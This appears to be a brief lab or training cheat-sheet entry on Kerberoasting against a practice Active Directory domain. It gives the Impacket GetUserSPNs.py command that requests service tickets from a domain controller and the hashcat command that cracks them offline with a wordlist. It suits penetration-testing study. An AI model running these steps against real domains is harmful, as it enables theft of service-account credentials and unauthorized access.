Kerberoasting with GetUserSPNs
└──╼ $GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
Password:
Crack the hash using hashcat.
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
Last updated